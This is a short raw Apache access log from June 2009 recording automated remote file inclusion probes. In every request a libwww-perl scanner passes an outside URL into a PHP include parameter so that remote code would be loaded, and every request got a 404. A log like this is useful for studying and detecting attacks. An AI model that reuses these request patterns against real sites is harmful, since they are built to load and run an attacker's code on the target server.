125.131.116.12 - - [28/Jun/2009:06:41:06 -0400] "GET //include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:41:09 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:41:14 -0400] "GET /logs/access_log.Q109052700//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
83.98.209.71 - - [28/Jun/2009:06:41:51 -0400] "GET /logs/error_log.Q109052300//atom.php5?page=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
